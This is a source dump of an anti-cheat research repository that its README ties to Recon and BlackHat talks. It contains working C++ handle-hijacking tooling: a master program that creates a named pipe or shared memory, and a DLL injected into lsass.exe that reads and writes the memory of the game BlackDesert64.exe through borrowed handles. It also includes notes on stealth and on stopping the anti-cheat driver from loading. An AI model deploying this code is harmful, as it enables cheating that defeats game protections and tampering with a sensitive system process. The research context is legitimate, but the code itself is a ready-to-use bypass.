CheatHelper::NtWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 157 | 158 | PMRequest.action = 6; 159 | CheatHelper::prepareRequest(PMRequest); 160 | CheatHelper::ZwRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 161 | 162 | PMRequest.action = 7; 163 | CheatHelper::prepareRequest(PMRequest); 164 | CheatHelper::ZwWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 165 | 166 | } 167 | 168 | 169 | int main() 170 | { 171 | CheatHelper::loadConfig(); 172 | 173 | // Setting up first action RPM 174 | //PMRequest.action = 1; 175 | PMRequest.handle = CheatHelper::requestHandleNP; 176 | PMRequest.address = 0x0; 177 | SecureZeroMemory(PMRequest.buffer, BUFSIZE); 178 | PMRequest.size = 0x0; 179 | 180 | DWORD processID = NULL; 181 | while (true) 182 | { 183 | processID = CheatHelper::GetProcId(CheatHelper::targetProc); 184 | if (processID != NULL) 185 | { 186 | std::cout << "[+] PID: 0x" << std::hex << processID << std::endl; 187 | break;// 188 | } 189 | } 190 | 191 | hProcessOP = OpenProcess(PROCESS_ALL_ACCESS, false, processID); 192 | if (!hProcessOP) { 193 | std::cout << "[-] OpenProcess: Unable to obtain handle " << std::dec << GetLastError() << std::endl; 194 | } 195 | else 196 | { 197 | std::cout << "[+] OpenProcess: 0x" << std::hex << hProcessOP << std::endl; 198 | //handleTests(hProcessOP); 199 | } 200 | 201 | 202 | if (!StartPipe()) 203 | { 204 | return 0; 205 | } 206 | 207 | 208 | if (!ReadPipe()) 209 | { 210 | std::cout << "[-] Failed reading Pipe." << std::endl; 211 | } 212 | 213 | if (PMResponse.status == 0) 214 | return 0; 215 | else 216 | std::cout << "[+] Cheat ready." << std::endl; 217 | 218 | // Clean PMRequest.address 219 | PMRequest.address = 0x0; 220 | 221 | int i = 1; 222 | while (1) 223 | { 224 | PMRequest.action = i; 225 | 226 | // We need to set the config values somehow, this is quickest way I found 227 | CheatHelper::prepareRequest(PMRequest); 228 | 229 | if (!WritePipe()) 230 | { 231 | std::cout << "[-] Failed writing Pipe." << std::endl; 232 | } 233 | 234 | if (!ReadPipe()) 235 | { 236 | std::cout << "[-] Failed reading Pipe." << std::endl; 237 | } 238 | 239 | if (i == 7) 240 | break; 241 | i++; 242 | } 243 | 244 | 245 | std::cout << "End!\n"; 246 | } 247 | 248 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 249 | // Debug program: F5 or Debug > Start Debugging menu 250 | 251 | // Tips for Getting Started: 252 | // 1. Use the Solution Explorer window to add/manage files 253 | // 2. Use the Team Explorer window to connect to source control 254 | // 3. Use the Output window to see build output and other messages 255 | // 4. Use the Error List window to view errors 256 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 257 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 258 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8B5D48FC-71B6-40DA-9415-64CF55DC29FF} 24 | Win32Proj 25 | HandleHijackingMaster 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper 95 | 96 | 97 | Console 98 | true 99 | 100 | 101 | 102 | 103 | NotUsing 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | pch.h 110 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories); 111 | 112 | 113 | Console 114 | true 115 | %(AdditionalDependencies) 116 | $(SolutionDir)x64\Debug;%(AdditionalLibraryDirectories);C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 | true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | {a080c117-d1db-4671-8217-65496573ba4d} 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | -------------------------------------------------------------------------------- /HandleHijackingMaster/HandleHijackingMaster.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /HandleHijackingMaster/README.md: -------------------------------------------------------------------------------- 1 | # HandleHijackingMaster 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **HandleHijackingDLL**. This is the "command and control" implementation. Has to be executed before injecting the DLL. 9 | 10 | HandleHijakingMaster will create a NamedPipe that the DLL will use to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | ## Configuration 13 | 14 | This module requires configuration: 15 | 16 | - ~~Address to Read/Write (TODO: implement to use multiple addresses, not just one)~~ 17 | - ~~Sequence of actions to perform (TODO: now it tries everything from 0 to 5, implement a list)~~ 18 | - ~~HANDLE to use as pivot (TODO: It is hardocded now so it need to be recompiled, it would be better to enumerate handles and identify the correct one).~~ 19 | - The following variables in config.ini need to the provided: 20 | 21 | [Addresses] 22 | ``` 23 | RPMAddressHigh=0x1 24 | RPMAddressLow=0x58A60000 25 | RPMAddress=0x0 26 | WPMAddressHigh=0x00000000 27 | WPMAddressLow=0x58A60000 28 | WPMAddress=0x0 29 | ntRVMAddressHigh=0x00000000 30 | ntRVMAddressLow=0x58A60000 31 | ntRVMAddress=0x0 32 | ntWVMAddressHigh=0x00000000 33 | ntWVMAddressLow=0x58A60000 34 | ntWVMAddress=0x0 35 | ZwRVMAddressHigh=0x00000000 36 | ZwRVMAddressLow=0x58A60000 37 | ZwRVMAddress=0x0 38 | ZwWVMAddressHigh=0x00000000 39 | ZwWVMAddressLow=0x58A60000 40 | ZwWVMAddress=0x0 41 | ``` 42 | 43 | [Handles] 44 | 45 | ``` 46 | requestHandleNP=0x15FC 47 | ``` 48 | 49 | [Buffers] 50 | ``` 51 | #SIZE MUST BE SIZE+1 52 | RPMBuffer=TTTT1 53 | RPMBufferSize=0x6 54 | WPMBuffer=TTTT2 55 | WPMBufferSize=0x6 56 | ntRVMBuffer=TTTT4 57 | ntRVMBufferSize=0x6 58 | ntWVMBuffer=TTTT5 59 | ntWVMBufferSize=0x6 60 | ZwRVMBuffer=TTTT6 61 | ZwRVMBufferSize=0x6 62 | ZwWVMBuffer=TTTT7 63 | ZwWVMBufferSize=0x6 64 | ``` 65 | 66 | [Strings] 67 | ``` 68 | targetProc=BlackDesert64.exe 69 | privotProc=lsass.exe 70 | #Edit in DLL if you changed it here 71 | namedPipeName=\\.\\pipe\\driverbypass 72 | ``` 73 | 74 | ## Combination with other techniques 75 | 76 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 77 | 78 | 79 | -------------------------------------------------------------------------------- /HandleHijackingMaster/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /HandleHijackingMaster/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AntiCheat-Testing-Framework 2 | Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I'm realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it. 3 | 4 | All this code is the result of a research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London). 5 | 6 | Twitter: [@Niemand_sec](https://twitter.com/niemand_sec) 7 | 8 | More info: [Personal Blog](https://niemand.com.ar/) 9 | 10 | - **Description for each module can be found on each folder**. 11 | - Modules can be used together or separated. 12 | - Cuztomization should be simple due to the modularity of the code. 13 | 14 | # Usage 15 | 16 | Most of the settings can be done by using config.ini file, however, some modules may require particular settings on the code, depending on your intentions. 17 | 18 | > Remember to change location of config.ini file at CheatHelper/CheatHelper.cpp (variable configFile) 19 | 20 | # Modules (more coming in the future) 21 | 22 | - CheatHelper 23 | - DriverDisabler 24 | - DriverHelper 25 | - ExternalCheatDriver 26 | - DriverTester 27 | - HandleElevationDriver 28 | - HandleHijackingDLL 29 | - HandleHijackingMaster 30 | - LuaHook 31 | - StealthHijackingNormalDLL 32 | - StealthHijackingNormalMaster 33 | 34 | # About this Project 35 | 36 | All this code is a result of the Researching presented at Recon 2019 and BlackHat Europe 2019: "Unveiling the underground world of Anti-Cheats" 37 | 38 | Links: 39 | - First Release Info: 40 | - https://recon.cx/2019/montreal/ 41 | - https://cfp.recon.cx/reconmtl2019/talk/MRJ3CN/ 42 | - Second Release: 43 | - https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17359 44 | 45 | 46 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/Readme.md: -------------------------------------------------------------------------------- 1 | # StealthHandleHijacking DLL 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **StealthHandleHijackingMaster**. This is the DLL implementation that has to be injected into a process that already has a handle to the game. 9 | 10 | HandleHijakingMaster will create a FileMapping (Share Memory) that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | ## Combination with other techniques 13 | 14 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 15 | 16 | 17 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.cpp: -------------------------------------------------------------------------------- 1 | // StealthHijackingNormalDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include 8 | 9 | #pragma warning(disable:5040) 10 | 11 | #define LOCK 0 12 | 13 | // EDIT if you modified the original name 14 | TCHAR fileMapName[] = TEXT("Global\\StealthHijacking"); 15 | 16 | HANDLE hFileMap = NULL; 17 | LPVOID pFileMapMem = NULL; 18 | SIZE_T fileMapSize = FILEMAPSIZE; 19 | 20 | PipeMessageRequest PMRequest; 21 | PipeMessageResponse PMResponse; 22 | 23 | int ReadFileMapping() 24 | { 25 | 26 | CopyMemory(&PMRequest, (void*)(pFileMapMem), sizeof(PipeMessageRequest)); 27 | std::cout << "[+] Reading Msg: " << std::endl; 28 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 29 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 30 | std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl; 31 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 32 | std::cout << "\t[+] buffer: "; 33 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, PMRequest.size); 34 | return 1; 35 | } 36 | 37 | 38 | int WriteFileMapping() 39 | { 40 | SecureZeroMemory(pFileMapMem, FILEMAPSIZE - 1); 41 | std::cout << "[+] Sending Msg: " << std::endl; 42 | std::cout << "\t[+] Status: " << PMResponse.status << std::endl; 43 | std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl; 44 | std::cout << "\t[+] buffer: "; 45 | CheatHelper::PrintBytes((PVOID)PMResponse.buffer, PMResponse.bytesRead); 46 | CopyMemory((void*)(pFileMapMem), &PMResponse, sizeof(PipeMessageResponse)); 47 | return true; 48 | } 49 | 50 | int handleAction() 51 | { 52 | switch (PMRequest.action) { 53 | case 0: //Ping 54 | { 55 | std::cout << '0' << std::endl; 56 | break; 57 | } 58 | case 1: //RPM 59 | { 60 | std::cout << '1' << std::endl; 61 | SIZE_T stRead = 0; 62 | 63 | int status = CheatHelper::RPM((HANDLE)PMRequest.handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, &PMResponse.bytesRead); 64 | 65 | if (status == 0)//SUCCESS 66 | { 67 | PMResponse.status = 0; 68 | return 0; 69 | } 70 | 71 | PMResponse.status = 1; 72 | return 1; 73 | } 74 | case 2: //WPM 75 | { 76 | std::cout << '2' << std::endl; 77 | SIZE_T stWrite = 0; 78 | 79 | int status = CheatHelper::WPM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, &stWrite); 80 | 81 | if (status == 0) //SUCCESS 82 | { 83 | PMResponse.status = 0; 84 | return 0; 85 | } 86 | 87 | PMResponse.status = 1; 88 | return 1; 89 | } 90 | case 3: //CreatRemoteThread 91 | { 92 | std::cout << '3' << std::endl; 93 | break; 94 | } 95 | case 4: //NtReadVirtualMemory 96 | { 97 | std::cout << '4' << std::endl; 98 | 99 | auto status = CheatHelper::NtRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 100 | 101 | if (status == 0) 102 | { 103 | PMResponse.status = 0; 104 | return 0; 105 | } 106 | 107 | PMResponse.status = 1; 108 | return 1; 109 | 110 | } 111 | case 5: //NtWriteVirtualMemory 112 | { 113 | std::cout << '5' << std::endl; 114 | SIZE_T stWrite = 0; 115 | 116 | int status = CheatHelper::NtWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 117 | if (status == 0) 118 | { 119 | PMResponse.status = 0; 120 | return 0; 121 | } 122 | 123 | PMResponse.status = 1; 124 | return 1; 125 | } 126 | case 6: //ZwReadVirtualMemory 127 | { 128 | std::cout << '6' << std::endl; 129 | 130 | auto status = CheatHelper::ZwRVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, (PULONG)&PMResponse.bytesRead); 131 | 132 | if (status == 0) 133 | { 134 | PMResponse.status = 0; 135 | return 0; 136 | } 137 | 138 | PMResponse.status = 1; 139 | return 1; 140 | 141 | } 142 | case 7: //ZwWriteVirtualMemory 143 | { 144 | std::cout << '7' << std::endl; 145 | SIZE_T stWrite = 0; 146 | 147 | int status = CheatHelper::ZwWVM((HANDLE)PMRequest.handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, (PULONG)&stWrite); 148 | if (status == 0) 149 | { 150 | PMResponse.status = 0; 151 | return 0; 152 | } 153 | 154 | PMResponse.status = 1; 155 | return 1; 156 | } 157 | default: 158 | { 159 | std::cout << "Default" << std::endl; 160 | break; 161 | 162 | } 163 | } 164 | } 165 | 166 | int Init() 167 | { 168 | 169 | // UNCOMMENT IF: We need to delay the connection to the Master. 170 | //Sleep(300000); 171 | 172 | hFileMap = OpenFileMapping(FILE_MAP_ALL_ACCESS, 0, fileMapName); 173 | if (hFileMap == NULL) 174 | { 175 | std::cout << "[-] CreateFileMappingA failed: " << GetLastError() << std::endl; 176 | return false; 177 | } 178 | std::cout << "[+] CreateFileMappingA." << std::endl; 179 | pFileMapMem = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fileMapSize); 180 | if (!pFileMapMem) 181 | { 182 | std::cout << "[-] MapViewOfFile failed." << std::endl; 183 | return false; 184 | } 185 | std::cout << "[+] MapViewOfFile." << std::endl; 186 | 187 | // Closing handle to go stealthier 188 | CloseHandle(hFileMap); 189 | 190 | CheatHelper::setSpinLockByte(pFileMapMem, !LOCK); 191 | 192 | } 193 | 194 | 195 | int main() { 196 | CheatHelper::ConsoleSetup("Client"); 197 | Init(); 198 | 199 | while (1) 200 | { 201 | CheatHelper::checkSpinLockByte(pFileMapMem, LOCK); 202 | 203 | if (!ReadFileMapping()) 204 | { 205 | std::cout << "[-] Failed reading." << std::endl; 206 | } 207 | 208 | int success = handleAction(); 209 | 210 | if (!WriteFileMapping()) 211 | { 212 | std::cout << "[-] Failed writing." << std::endl; 213 | } 214 | 215 | CheatHelper::setSpinLockByte(pFileMapMem, !LOCK); 216 | 217 | if (PMRequest.action == 7) 218 | { 219 | break; 220 | } 221 | } 222 | 223 | UnmapViewOfFile(pFileMapMem); 224 | 225 | } 226 | 227 | 228 | BOOL APIENTRY DllMain(HMODULE hModule, 229 | DWORD ul_reason_for_call, 230 | LPVOID lpReserved 231 | ) 232 | { 233 | switch (ul_reason_for_call) 234 | { 235 | case DLL_PROCESS_ATTACH: 236 | { 237 | DisableThreadLibraryCalls(hModule); 238 | CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)main, NULL, NULL, NULL); 239 | } 240 | case DLL_THREAD_ATTACH: 241 | case DLL_THREAD_DETACH: 242 | case DLL_PROCESS_DETACH: 243 | break; 244 | } 245 | return TRUE; 246 | } 247 | 248 | 249 | 250 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {09373BE0-A33D-4D50-8148-E9DF5EF1ABCE} 24 | Win32Proj 25 | StealthHijackingNormalDLL 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | $(VCInstallDir)lib;%(AdditionalLibraryDirectories);C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 99 | 100 | 101 | 102 | 103 | Use 104 | Level3 105 | Disabled 106 | true 107 | WIN32;_DEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 108 | true 109 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 110 | 111 | 112 | Windows 113 | true 114 | 115 | 116 | 117 | 118 | Use 119 | Level3 120 | MaxSpeed 121 | true 122 | true 123 | true 124 | WIN32;NDEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Windows 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | NotUsing 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | _CRT_SECURE_NO_WARNINGS;NDEBUG;STEALTHHIJACKINGNORMALDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 143 | true 144 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 145 | 146 | 147 | Windows 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | {a080c117-d1db-4671-8217-65496573ba4d} 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/StealthHijackingNormalDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /StealthHijackingNormalDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/Readme.md: -------------------------------------------------------------------------------- 1 | # StealthHandleHijackingMaster 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module is used combinaded with **StealthHandleHijackingDLL**. This is the "command and control" implementation. Has to be executed before injecting the DLL. 9 | 10 | HandleHijakingMaster will create a FileMapping (Share Memory) that this module uses to receive instructions and then return information to the master (where all the bot logic should be located). 11 | 12 | ## Configuration 13 | 14 | This module requires configuration: 15 | 16 | - The following variables in config.ini need to the provided: 17 | 18 | [Addresses] 19 | ``` 20 | RPMAddressHigh=0x1 21 | RPMAddressLow=0x58A60000 22 | RPMAddress=0x0 23 | WPMAddressHigh=0x00000000 24 | WPMAddressLow=0x58A60000 25 | WPMAddress=0x0 26 | ntRVMAddressHigh=0x00000000 27 | ntRVMAddressLow=0x58A60000 28 | ntRVMAddress=0x0 29 | ntWVMAddressHigh=0x00000000 30 | ntWVMAddressLow=0x58A60000 31 | ntWVMAddress=0x0 32 | ZwRVMAddressHigh=0x00000000 33 | ZwRVMAddressLow=0x58A60000 34 | ZwRVMAddress=0x0 35 | ZwWVMAddressHigh=0x00000000 36 | ZwWVMAddressLow=0x58A60000 37 | ZwWVMAddress=0x0 38 | ``` 39 | 40 | [Handles] 41 | 42 | ``` 43 | requestHandleFM=0x15FC 44 | ``` 45 | 46 | [Buffers] 47 | ``` 48 | #SIZE MUST BE SIZE+1 49 | RPMBuffer=TTTT1 50 | RPMBufferSize=0x6 51 | WPMBuffer=TTTT2 52 | WPMBufferSize=0x6 53 | ntRVMBuffer=TTTT4 54 | ntRVMBufferSize=0x6 55 | ntWVMBuffer=TTTT5 56 | ntWVMBufferSize=0x6 57 | ZwRVMBuffer=TTTT6 58 | ZwRVMBufferSize=0x6 59 | ZwWVMBuffer=TTTT7 60 | ZwWVMBufferSize=0x6 61 | ``` 62 | 63 | [Strings] 64 | ``` 65 | targetProc=BlackDesert64.exe 66 | privotProc=lsass.exe 67 | #Edit in DLL if you changed it here 68 | fileMapName=Global\StealthHijacking 69 | ``` 70 | 71 | ## Combination with other techniques 72 | 73 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 74 | 75 | 76 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.cpp: -------------------------------------------------------------------------------- 1 | // StealthHijackingNormalMaster.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include 8 | 9 | #pragma warning(disable:5040) 10 | #define LOCK 1 11 | 12 | 13 | std::string fileMapName = ""; 14 | HANDLE hFileMap = NULL; 15 | HANDLE hTargetProcess = NULL; 16 | HANDLE hExplorerProcess = NULL; 17 | LPVOID pFileMapMem = NULL; 18 | SIZE_T fileMapSize = FILEMAPSIZE; 19 | 20 | 21 | PipeMessageRequest PMRequest; 22 | PipeMessageResponse PMResponse; 23 | 24 | int ReadFileMapping() 25 | { 26 | CopyMemory(&PMResponse, (void*)(pFileMapMem), sizeof(PipeMessageResponse)); 27 | if (PMResponse.status == 0) 28 | { 29 | std::cout << "\t[+] Status: Successful" << std::endl; 30 | } 31 | else 32 | { 33 | std::cout << "\t[-] Status: Unsuccessful" << std::endl; 34 | } 35 | //std::cout << "\t[+] bytesRead: " << PMResponse.bytesRead << std::endl; 36 | //std::cout << "\t[+] buffer: "; 37 | //CheatHelper::PrintBytes((PVOID)PMResponse.buffer, (SIZE_T)PMResponse.bytesRead); 38 | return 1; 39 | } 40 | 41 | 42 | int WriteFileMapping() 43 | { 44 | SecureZeroMemory(pFileMapMem, FILEMAPSIZE - 1); 45 | std::cout << "[+] Sending Msg: " << std::endl; 46 | std::cout << "\t[+] action: " << PMRequest.action << std::endl; 47 | std::cout << "\t[+] handle: 0x" << PMRequest.handle << std::endl; 48 | std::cout << "\t[+] address: 0x" << std::hex << PMRequest.address << std::endl; 49 | std::cout << "\t[+] size: " << PMRequest.size << std::endl; 50 | std::cout << "\t[+] buffer: "; 51 | CheatHelper::PrintBytes((PVOID)PMRequest.buffer, (SIZE_T)PMRequest.size); 52 | CopyMemory((void*)(pFileMapMem), &PMRequest, sizeof(PipeMessageRequest)); 53 | return true; 54 | } 55 | 56 | 57 | bool Init() 58 | { 59 | CheatHelper::loadConfig(); 60 | 61 | //fileMapName = "Global\\StealthHijacking"; 62 | hFileMap = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE | SEC_COMMIT | SEC_NOCACHE, 0, (DWORD)fileMapSize, CheatHelper::fileMapName); 63 | if (!hFileMap) 64 | { 65 | std::cout << "[-] CreateFileMappingA failed: " << std::dec << GetLastError() << std::endl; 66 | return 1; 67 | } 68 | std::cout << "[+] CreateFileMappingA." << std::endl; 69 | pFileMapMem = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fileMapSize); 70 | if (!pFileMapMem) 71 | { 72 | std::cout << "[-] MapViewOfFile failed: " << std::dec << GetLastError() << std::endl; 73 | return 1; 74 | } 75 | std::cout << "[+] MapViewOfFile." << std::endl; 76 | 77 | CheatHelper::checkSpinLockByte(pFileMapMem, LOCK); 78 | 79 | return 0; 80 | } 81 | 82 | 83 | 84 | 85 | 86 | int main() 87 | { 88 | std::cout << "[+] Init\n"; 89 | 90 | 91 | if (!Init()) 92 | { 93 | 94 | //PMRequest.action = 1; 95 | //PMRequest.handle = (HANDLE)0xC32; 96 